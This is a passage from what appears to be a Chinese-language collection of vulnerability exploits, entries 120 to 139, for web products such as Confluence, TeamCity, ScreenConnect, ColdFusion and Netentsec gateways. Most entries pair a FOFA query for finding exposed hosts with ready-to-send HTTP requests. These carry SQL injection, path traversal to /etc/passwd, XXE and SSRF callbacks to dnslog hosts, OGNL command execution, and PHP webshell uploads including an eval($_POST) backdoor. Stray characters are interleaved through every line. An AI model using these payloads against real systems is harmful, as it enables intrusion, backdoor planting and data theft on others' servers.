" Y# h4 m8 }( ?/ l; z. r0 i/ asrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234564 i7 n# x" d }. `
% T$ ~: `/ L$ N8 N6 I
- L/ ^3 Z' q3 U! h; `3 G120. 北京百绰智能S40管理平台导入web.php任意文件上传& T# i$ i5 v& U
CVE-2024-1253
0 z; p6 p$ ^% ?! T, y1 ^FOFA:title="Smart管理平台"
& W, W0 x& U" j J# c5 FPOST /useratte/web.php? HTTP/1.1
. p1 J4 D: o; w8 I) A% ]Host: ip:port9 K4 w6 B9 p( @8 _7 t7 \5 n0 h
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db7 ?' [2 h& y% C, ]" }# S
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ y# a4 p: I c9 i3 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, A+ L5 g, h. K( t4 {1 Y/ s: p! \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- J8 g+ r& Y/ G" G3 p' `0 F9 F4 l4 q7 f
Accept-Encoding: gzip, deflate: V# i# T" `7 i4 Z
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
; H/ u* \- `! p/ F, RContent-Length: 597
4 N' `+ ^' h, r" ZOrigin: https://ip:port
: F8 h5 o* m& m0 f3 _$ z5 ]Referer: https://ip:port/sysmanage/licence.php
' ^9 q; k7 s3 D D2 R1 XUpgrade-Insecure-Requests: 1
$ Q, c6 a( _9 O6 X8 Z1 a. LSec-Fetch-Dest: document0 @& B- k, d+ V5 b, d1 E2 @" R
Sec-Fetch-Mode: navigate( ?, K5 J* M* g5 V
Sec-Fetch-Site: same-origin8 Z8 H' o" }1 D3 F
Sec-Fetch-User: ?1
. |4 p% A# C# V4 I( y/ u$ dTe: trailers7 ^5 i8 k: d, k5 `% g1 P) @
Connection: close$ U3 B! @: \. v* D
; p! C0 `4 l/ W [1 x- `2 Q-----------------------------42328904123665875270630079328" G! D3 t _2 z, ]
Content-Disposition: form-data; name="file_upload"; filename="2.php"
4 b( n* l8 z4 c+ X2 U! ?8 {! V* qContent-Type: application/octet-stream
+ ~2 x" s- G2 E$ I3 P- g
' a& B: Q: N: f+ M- [<?php phpinfo()?>
% H5 M- [! W6 i-----------------------------423289041236658752706300793287 o/ r. q, [, p8 D% \
Content-Disposition: form-data; name="id_type"
6 H& D) i, q7 l& m, ?- w
4 @' M; A2 u* e3 V18 x+ k3 K0 n/ \
-----------------------------42328904123665875270630079328
L5 o+ t& E' t! @4 `# gContent-Disposition: form-data; name="1_ck"9 Q2 ~# h: i( y( M8 a
?/ p. n1 U' }! w/ c0 b
1_radhttp
) g7 v6 F! D6 A$ a-----------------------------42328904123665875270630079328
3 B' S5 E' X8 A$ ^2 [Content-Disposition: form-data; name="mode"/ w, D8 o5 `9 c H6 K
5 _ f4 S, J# E$ c0 {7 o* Eimport8 t( Z+ c5 t8 }& ]4 w
-----------------------------42328904123665875270630079328: U& C# Z3 O- }* P7 i
" A& z# f" h7 k. r0 y" l6 |6 O0 E% i: |
+ `4 v* g9 T% h/ e5 S9 g) m文件路径/upload/2.php
5 l- u1 i2 u/ v& G
, f5 _" T6 m/ A121. 北京百绰智能S42管理平台userattestation.php任意文件上传9 s5 {- _% f) c8 j! I2 W
CVE-2024-1918
2 s' @: h# x3 l8 ?1 |( yFOFA:title="Smart管理平台"* Q' @/ s( [3 G l; H# _0 A) W+ f
POST /useratte/userattestation.php HTTP/1.1( m) t5 e! L/ \! f2 z/ T
Host: 192.168.40.130:84437 U3 [; x& K% Y# O- h
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
( a" t; g) e# C2 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
* L7 ?2 G' j8 L) L& IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ I: e4 D w3 P% ^% p/ c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 S5 C2 `" f6 U0 u9 `Accept-Encoding: gzip, deflate
1 f5 V" x0 E3 O- a8 ^1 _Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 ~. e* p( i) zContent-Length: 592
. V9 X; P7 B ]& D7 |" lOrigin: https://192.168.40.130:8443
+ o+ K7 c- T/ m; L* a" w+ sUpgrade-Insecure-Requests: 1
& n8 T( ^0 L4 T# J+ X2 P6 D/ m7 M, uSec-Fetch-Dest: document7 m# a5 K8 p- M* P7 D3 ]4 Z( a7 g
Sec-Fetch-Mode: navigate
, H- l$ L( m2 o5 H4 _Sec-Fetch-Site: same-origin# p6 M f: M( {4 n; A7 k1 S' n
Sec-Fetch-User: ?1& a' R# r7 Q0 G0 J$ {1 O o
Te: trailers; u4 ]- o1 B8 i; t) z, Q& g" J
Connection: close2 D5 d& s" E0 _- ]# Z8 L
, I+ l: F+ W+ j6 z
-----------------------------42328904123665875270630079328/ _( ~" ^9 `& {' n3 q
Content-Disposition: form-data; name="web_img"; filename="1.php"
+ X* O/ ~ F6 Z8 {Content-Type: application/octet-stream' t* t# u+ P& Z. Z- Z( x$ u3 ?
% E& d- g( c) S+ H! q<?php phpinfo();?>" x. U, o4 ~/ m% H2 a
-----------------------------42328904123665875270630079328
2 g8 A4 M* c" N9 JContent-Disposition: form-data; name="id_type"1 N3 {2 c* ]% E2 N2 L/ [- w
& T) }; ?9 ]0 ^
1% j' K4 s; N: Q* f9 E
-----------------------------42328904123665875270630079328/ h. E( M1 {$ E
Content-Disposition: form-data; name="1_ck"
# W/ E, ]2 ^1 f( z5 a% e$ L H; Y) x. i! N4 v6 K9 l7 o/ ^
1_radhttp
9 X- ^8 p& a% R0 z-----------------------------423289041236658752706300793285 [5 U3 A) }( ~4 D2 F+ q/ M# [
Content-Disposition: form-data; name="hidwel"
5 c" }2 u9 D! B- E' `( w8 ?. ~2 i- | S' I
set
2 S6 B# t" F7 S$ R, u-----------------------------42328904123665875270630079328
. s8 `; o, u* {+ x! Q# l3 d: l t/ g V
" J- b8 J- v. A# h
boot/web/upload/weblogo/1.php$ d! d9 r+ |; ?1 G* X+ h% q
% R) M. |; a T( L122. 北京百绰智能s200管理平台/importexport.php sql注入" V" a$ `( _4 T/ T$ v; L
CVE-2024-27718FOFA:title="Smart管理平台"
* h! c1 t) y+ L1 H3 ]! M其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version(): g1 ^* u6 u* H3 S$ f: z8 G/ [
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
" X5 C- M- t. z2 B0 B7 GHost: x.x.x.x4 e6 T4 t; G# B8 z" Y0 L' S4 \
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
* Z4 {$ K4 v) }6 n3 |0 B3 @6 B! P$ ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ C+ k2 v4 |3 ^# L8 o/ Q+ p& xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) E1 \5 h/ p. C- T, s$ \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% @. i$ X( p: {
Accept-Encoding: gzip, deflate, br4 N% K h, E6 B6 d$ z$ ]' z" p
Upgrade-Insecure-Requests: 1
* ~' B' H5 `9 Z4 ^Sec-Fetch-Dest: document5 r9 f+ y' ?" M: \2 f! d% ^% X
Sec-Fetch-Mode: navigate
- O; y' [+ j# m: X0 q4 bSec-Fetch-Site: none
! G9 v4 X+ p$ {: k# n7 ESec-Fetch-User: ?1! G3 j! X9 t/ H# y Q
Te: trailers7 n+ h _3 I; E% W% R- O+ g
Connection: close8 \* R8 s/ h! k" ^
( \: ], f9 k# J" i/ e0 h& q; R% \% i
123. Atlassian Confluence 模板注入代码执行& m2 ?' r0 ^4 y9 a+ w
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"/ L& M% W& C2 i2 q+ C0 K! I6 [
POST /template/aui/text-inline.vm HTTP/1.1
. B7 ?/ \: Z* O5 P) V l% s9 H$ [' PHost: localhost:8090 i) l$ N( M& M/ W
Accept-Encoding: gzip, deflate, br
; Y0 W# f/ ]6 y: [6 uAccept: */*
. U1 |. a% G5 E, ~Accept-Language: en-US;q=0.9,en;q=0.8* X. Z x1 ~+ y6 P) o9 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
2 S/ C& d o% u f" u* x' MConnection: close5 a% E8 q, d/ |, }6 U% K, D
Content-Type: application/x-www-form-urlencoded
1 m6 T( J6 s9 @; i3 k7 q& a h) ~$ E: H. t+ B) U
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
3 Y) `: W- A! M: o+ U7 g1 d4 _& d7 |* d P6 N* d
0 p' l9 p1 s) I2 j: }, p124. 湖南建研工程质量检测系统任意文件上传1 b. W7 P0 V( ]
FOFA:body="/Content/Theme/Standard/webSite/login.css"7 n) O9 ?6 l; D6 G3 i! B
POST /Scripts/admintool?type=updatefile HTTP/1.1, W R! ?4 ]/ _. G0 K l% h
Host: 192.168.40.130:8282* Y+ i" R8 i$ V/ X3 k
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. y) @/ N, g6 P- y& N
Content-Length: 721 x% E7 \) o0 ]# p' t4 h5 M, \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
; G0 R6 K3 `( w7 \Accept-Encoding: gzip, deflate, br
0 X0 Y$ E% Y: `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( L7 i6 _8 m$ M( h l! E
Connection: close' Q0 y1 I6 G, h [. q
Content-Type: application/x-www-form-urlencoded
W% z `% J+ k3 a1 P9 K$ o9 H' d0 ~- m9 v- @: e# D
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
) U, i' `0 N* N X+ n) M; U8 [# R! J+ `5 e% I+ ]/ J9 L2 H
& {5 l, F1 m# o# z5 \. |
http://192.168.40.130:8282/Scripts/abcgcg.aspx+ N: h& t2 ^3 o! u" V( {9 p
$ u3 l- d& A/ O9 V. \; H125. ConnectWise ScreenConnect身份验证绕过! K$ z+ D8 b2 @! f9 C9 M3 P
CVE-2024-17093 {/ j" f9 X( z5 b3 V
FOFA:icon_hash="-82958153"
7 i# E- }. o- {1 I3 Chttps://github.com/watchtowrlabs ... bypass-add-user-poc+ Y9 [9 q! k! L' K4 f3 _6 z4 H* U& q
2 b9 s9 {' r- a# p; y9 j1 ^& I% |, p4 N1 M. W; d
使用方法" u# ]( T3 V% Q& t
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
% o9 M* y7 K, n- y5 I
9 U; L N/ G3 T7 x; h
9 \5 Q$ Z* ?' e$ r8 |8 ~1 ^* u% q j创建好用户后直接登录后台,可以执行系统命令。- g( P2 x' x& I0 z" q
) I) ^2 _; R, n% {0 P; [126. Aiohttp 路径遍历
" ?: v8 v& b1 j, F4 u* RFOFA:title=="ComfyUI"' h' o2 g' | |# A9 t
GET /static/../../../../../etc/passwd HTTP/1.1
; t8 s( ]1 X wHost: x.x.x.x# S2 ^, P5 e* r8 l0 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 [! n( H6 j. d
Connection: close7 s N9 a1 r: g0 A1 w5 T: W0 a
Accept: */*. P6 I0 R- m" B6 ]- K+ Z2 `1 B9 J
Accept-Language: en) _* {# X. v% ~8 t
Accept-Encoding: gzip
" A' M2 M! h U8 C$ b
3 y7 c0 i& g$ O" T; l/ L! a v2 G2 F/ R; d/ V( v" T4 N0 m% Q
127. 广联达Linkworks DataExchange.ashx XXE# V" C' i @6 t6 P
FOFA:body="Services/Identification/login.ashx"
# a) v' f. S/ |: t0 u' GPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1- ^# Y1 D9 \ Y4 ?& e m: t8 q6 ]- J
Host: 192.168.40.130:8888* }" S& h' G! I; z# S3 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 C& c A6 Y* [3 m3 c6 f. ]
Content-Length: 415
8 D+ W. Y. s. {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 {" f" g7 Z& s3 D8 ^
Accept-Encoding: gzip, deflate+ e. E% Q3 k; a" l# {' N
Accept-Language: zh-CN,zh;q=0.9$ j9 l# [5 O' E- F/ x9 K
Connection: close g% ^ e) m. b$ f
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
6 i9 G# v8 s! C' YPurpose: prefetch
; g+ Q, Z( J2 K+ \* R3 g5 B2 LSec-Purpose: prefetch;prerender/ r& K5 H" _. \. u, p+ ^
( k0 j+ u! O( J
------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ ^1 R# S/ K* p! FContent-Disposition: form-data;name="SystemName"
# Q. }5 _" P$ _8 J: u) ^& ~9 r; d3 l' M7 q. o3 k/ }+ V* u
BIM/ f6 m7 s( Y1 a" I2 Z0 [! J d
------WebKitFormBoundaryJGgV5l5ta05yAIe09 d& G" k6 {+ e2 F6 ~) j
Content-Disposition: form-data;name="Params"& V: m5 A6 R" W
Content-Type: text/plain
- c! x/ s. T" e( _8 l9 G9 C) p e: j! y
<?xml version="1.0" encoding="UTF-8"?>0 q0 q2 F- M0 U& z
<!DOCTYPE test [
x- f5 H/ v6 U1 {& {& W<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
' j+ {, T" H8 q- ^- S U5 _]6 Q6 v! @9 _. g" G
>+ m5 _2 Z% a3 j! V2 Q5 F
<test>&t;</test>- O; k) R& e- y4 X. K8 G3 i
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
/ S! C/ y1 w( R, u6 M! v& r/ B# B' c B' n) v" u
) x( ^& V) \9 t: z# @* n
/ `9 \8 J V- ?, `( T5 _4 G" y128. Adobe ColdFusion 反序列化
( H0 |( ]% ^( D! b+ Y9 `# dCVE-2023-382031 t1 e% o X; m$ [
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
1 ~4 Y) I$ g8 n7 U* }& \( LFOFA:app="Adobe-ColdFusion"
& O3 q2 G/ ^1 n/ c0 i! D4 T% qPAYLOAD
6 X+ W5 |0 _! n4 d' \' v) y' ~( S5 F% h% J' X: j, h9 M9 C! D6 |% f- \
129. Adobe ColdFusion 任意文件读取# |: c7 w- D' c8 E) j: S/ E! F( s% u
CVE-2024-20767; _* s- L/ N; o' E; e0 ]
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"0 z+ j2 S) q0 k- r; d! y3 {
第一步,获取uuid4 t ^9 N: p5 J1 |8 n9 i; [; X
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1! {& x, c% h$ j' Z4 C; K7 T; A
Host: x.x.x.x5 ~) R& G1 u2 Q9 b6 X/ F/ p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 A7 ~9 K5 i! A8 F, E& w
Accept: */*
! k3 @8 d; |" L( x5 U( EAccept-Encoding: gzip, deflate4 w# a+ {( \; L' x
Connection: close- c1 p9 S3 D# D/ J4 r! C9 \/ k
8 B# Z# s; E8 ~0 a
]! J9 n5 Q* \" V: q# m2 x第二步,读取/etc/passwd文件5 g7 d' K8 y3 P" \
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
; X) p' j! f9 ^6 GHost: x.x.x.x6 F$ n/ l N+ E# G. [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" l1 X2 ?. z& p w; c0 I6 h
Accept: */*) J' F. M' p t) O3 E1 t) R
Accept-Encoding: gzip, deflate/ e+ a' A' O6 b; i H" T9 e' P
Connection: close
) C* K! Q1 Z' p$ l$ y2 H) `% G Duuid: 85f60018-a654-4410-a783-f81cbd5000b9
4 C! \% h0 Z* Q& F! P- m9 P0 h1 m. D
z" Y9 y$ @; M+ I/ \
130. Laykefu客服系统任意文件上传$ ^6 j; S6 R% V* r, Y' y
FOFA:icon_hash="-334624619"$ Y+ |. Y8 }3 T$ Y2 Z1 v' |3 j
POST /admin/users/upavatar.html HTTP/1.1
! @! v) d+ Q; A( C+ E. e$ y. ZHost: 127.0.0.15 Z+ g9 Q+ v4 K7 W0 j) e0 Y" l3 ?
Accept: application/json, text/javascript, */*; q=0.01
+ B, s) y+ o! Z& W3 rX-Requested-With: XMLHttpRequest0 D4 a9 P/ \! C; U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26 I2 F/ t. n- j" Y! Y i. a* j( B+ n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
! a% C8 h6 r; b ?1 O5 D+ ^Accept-Encoding: gzip, deflate& ?; b/ [: ?+ V
Accept-Language: zh-CN,zh;q=0.98 a8 O; w* Q+ E# F
Cookie: user_name=1; user_id=3* Z# ~1 I2 u3 {3 Y4 K" J
Connection: close
0 t3 |$ Z6 F) x, s+ C3 K2 A- {$ C& W% v" E9 F0 E7 P
------WebKitFormBoundary3OCVBiwBVsNuB2kR
: H0 h8 ^9 ^) f+ b8 @Content-Disposition: form-data; name="file"; filename="1.php"" w# q; s; V! B4 I! H9 @" b. P
Content-Type: image/png% S4 [! L! @, C- |
; L2 I% b( m" r
<?php phpinfo();@eval($_POST['sec']);?>- g" y8 J9 Y; i& ]
------WebKitFormBoundary3OCVBiwBVsNuB2kR--/ t+ h; z' d. z1 I5 @8 r
! `7 ^) ^; j. g. s2 I2 f
' [% A7 {. u; b% B7 h0 C
131. Mini-Tmall <=20231017 SQL注入 H) \! R4 `! b2 N% I: [, q
FOFA:icon_hash="-2087517259"" q& H; e3 u7 m0 w: @" J; \5 C
后台地址:http://localhost:8080/tmall/admin
3 h; ]) p6 T: G# f {http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)# E2 W2 Y a& s! t
* S0 f' K1 X4 O2 U5 k132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过8 W9 [5 N7 F3 n) }" F
CVE-2024-27198 i/ I! C* {7 i9 ^6 C
FOFA:body="Log in to TeamCity"* r- K3 g0 G( ?& N. Q
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.12 W2 V$ G7 s+ w
Host: 192.168.40.130:8111
q4 F( F. b0 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 M/ C: C; _+ |4 o! {) uAccept: */*; V6 J/ ?- x& h- C
Content-Type: application/json; `# R* o6 \% P8 Z6 s. L
Accept-Encoding: gzip, deflate
1 p+ C$ e. v& H7 |" W
" @! |$ F6 \% ^5 S$ k6 D{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
! P4 B: Y! e0 G% F/ v% l- @7 Q& p7 T, @) q
9 d+ b8 _0 E+ @) z1 \! H
CVE-2024-27199- ?$ }) q9 T' ?, n% M
/res/../admin/diagnostic.jsp
: j3 j, c- Q6 Y4 _1 E" q. C/.well-known/acme-challenge/../../admin/diagnostic.jsp
+ U& t6 T5 D* i: ~7 N8 r/update/../admin/diagnostic.jsp( w+ B2 P3 |1 A- Y: y
3 n( u# A3 ?1 i# T. U; ]: M
: t& L( j, K0 _. YCVE-2024-27198-RCE.py
; ?4 `* F) g( z! y9 T8 ~
( k/ g* q I8 x133. H5 云商城 file.php 文件上传
: |5 ~# O- f( q' o7 N* O N1 UFOFA:body="/public/qbsp.php"
: j9 a, E- k" ?1 q! L% IPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
, s* M& r+ r. O; `- y" bHost: your-ip
0 n' e( Z& y; X# L# l( l9 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.360 n2 {( a3 m A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx( I! b1 a+ e5 N. E6 |5 Y
2 ?" \* p0 j, `! A8 T1 J, r: h------WebKitFormBoundaryFQqYtrIWb8iBxUCx
; c" m" e; v9 v7 T: w3 nContent-Disposition: form-data; name="file"; filename="rce.php"
" M* Y) f. |7 [2 e" TContent-Type: application/octet-stream, d8 Y+ {; D; c T
6 I4 @# Y9 Z2 t! n: K
<?php system("cat /etc/passwd");unlink(__FILE__);?>
# d6 n. h% D9 X* P6 a------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
# G( Z: N' n8 W9 O, k8 H# `) K/ X
1 I- z I5 k8 I3 `" r" V! v. q. W- m+ ~
134. 网康NS-ASG应用安全网关index.php sql注入
3 C% p9 @4 i' ?& b& p) {" g$ OCVE-2024-2330
P8 N) v1 j% P5 L* ZNetentsec NS-ASG Application Security Gateway 6.3版本
6 B2 U2 j9 w# B+ `9 u4 T/ r# YFOFA:app="网康科技-NS-ASG安全网关"
. H# v3 a% X7 H9 APOST /protocol/index.php HTTP/1.1
4 q) f" y0 C" V7 m7 U( ]$ iHost: x.x.x.x
2 w. q" C' D- h2 KCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de; N$ I+ Q% i, g2 [" d& u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0. S0 g, \: R/ Q# N! V4 ?
Accept: */*
6 B2 F; y$ q: g! uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! d. M% _2 w/ W" w0 m( XAccept-Encoding: gzip, deflate: `) O7 d, x. ?- N" Q; N! j% F- `
Sec-Fetch-Dest: empty
0 u) Z* G1 |( h/ R% fSec-Fetch-Mode: cors$ |. k: T, n) n5 g# P
Sec-Fetch-Site: same-origin
8 |* g8 G1 ]4 t2 p7 E X5 z' KTe: trailers
. Z' Y/ A6 o3 t6 T% S3 C) ^7 m+ `Connection: close' u L& R; S/ u9 r# \% n: t; X
Content-Type: application/x-www-form-urlencoded: b! x: a; f) y9 W4 M4 `" h7 G
Content-Length: 263* W$ e/ f+ l; a4 v
& Z, M: H' [- X+ t0 M8 Wjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
; p( S. @. P- T
, L' G2 L2 I8 p8 a2 i! y
# `" \0 l1 ^$ ?; t- T* w0 x135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; x, u& s( ~2 f, c) F9 a1 @6 h) }" ICVE-2024-20226 j8 k1 H7 R& F
Netentsec NS-ASG Application Security Gateway 6.3版本0 u Z/ z! S2 ]8 g9 H D [( o
FOFA:app="网康科技-NS-ASG安全网关"
* x4 c7 ]( r$ i/ W7 x/ O8 x# q/ r( JGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
8 \; u0 m9 y/ i& wHost: x.x.x.x8 P1 ^# L" P. d/ I# Q3 E- t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 _; Y L' j1 p2 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% H8 j9 m m+ j+ F/ A! c; n( [Accept-Encoding: gzip, deflate7 c: T e6 r7 ~3 u0 Q9 k4 a
Accept-Language: zh-CN,zh;q=0.94 o2 O; E+ v1 B, P, i C
Connection: close
7 H/ _! \7 v! H8 P9 g8 D9 a1 R3 C( Z( B
( n+ t2 U* O7 `- R, x136. NextChat cors SSRF, d D# k8 ]+ O, w
CVE-2023-49785# e. L- c6 r2 H4 n
FOFA:title="NextChat"
# j7 K% N+ T0 z9 O6 \+ ^8 i pGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1/ t/ ~# U8 h) G7 V }
Host: x.x.x.x:100000 \' z6 Y- A5 O: I/ j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ u7 Q( M* c2 e0 z5 d0 I& s
Connection: close
" \1 S) s8 y0 p/ hAccept: */*1 T* e6 H8 B4 n; g/ ~& y6 U
Accept-Language: en
/ j! G( V! X i' [$ u* CAccept-Encoding: gzip6 {: }) ?% Y" [
$ S9 U) i: h, N- M/ _& N7 U
$ `) w; i# D- K( N, ^- _137. 福建科立迅通信指挥调度平台down_file.php sql注入' a4 G9 I" M& }$ q
CVE-2024-2620: Z# N8 D; r6 Y0 B
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 R2 \, h% ?) w
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
& h& R) W |4 X9 G: A8 JHost: x.x.x.x
* d0 F- U, E8 n+ S& n! C3 ]; L% TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 F4 v0 v0 T3 k, X7 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# W; g6 h0 [2 y3 D- |; p+ NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ A; I; y! B: R1 w
Accept-Encoding: gzip, deflate, br) O, {0 G* O* C* Q( d! f, u+ U
Connection: close! x, R) j' b7 R0 k, G- z9 \
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
1 Y/ I0 n0 U% h+ LUpgrade-Insecure-Requests: 15 D& c6 Z* ?* ~3 f7 v' u% ?
) Y H M$ H( ^2 k+ f5 o8 L9 R
" c% {: P. q! @5 ]138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
H" M x+ V+ ]. D6 H$ k' FCVE-2024-2621
) W. T' p! {5 ^! rFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- V. x0 z% s: M. L" R& t7 m1 i
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1. h1 p: T2 w& N' g) L1 Z
Host: x.x.x.x
% n+ z3 D/ r* o* z3 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
' g' m# b1 O6 W# @6 ?5 i2 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: \1 \8 I& V( N# M3 `, ]0 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( V+ b/ J: w( b3 v& L! {
Accept-Encoding: gzip, deflate, br
/ f4 ^, ^; B9 @" `" dConnection: close
7 _5 E V- [0 M- \- xUpgrade-Insecure-Requests: 1
% m2 h# N& U# L9 `3 a
# H0 }0 q' W' s4 R9 G- v) L2 d' R! a/ \+ q
139. 福建科立讯通信指挥调度平台editemedia.php sql注入5 I5 o, I' ?& P0 E
CVE-2024-2622
0 v7 n* U, j6 d+ W. [: p9 ~, O- XFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 ^2 S9 x M/ Q2 z& [" J* v3 YGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
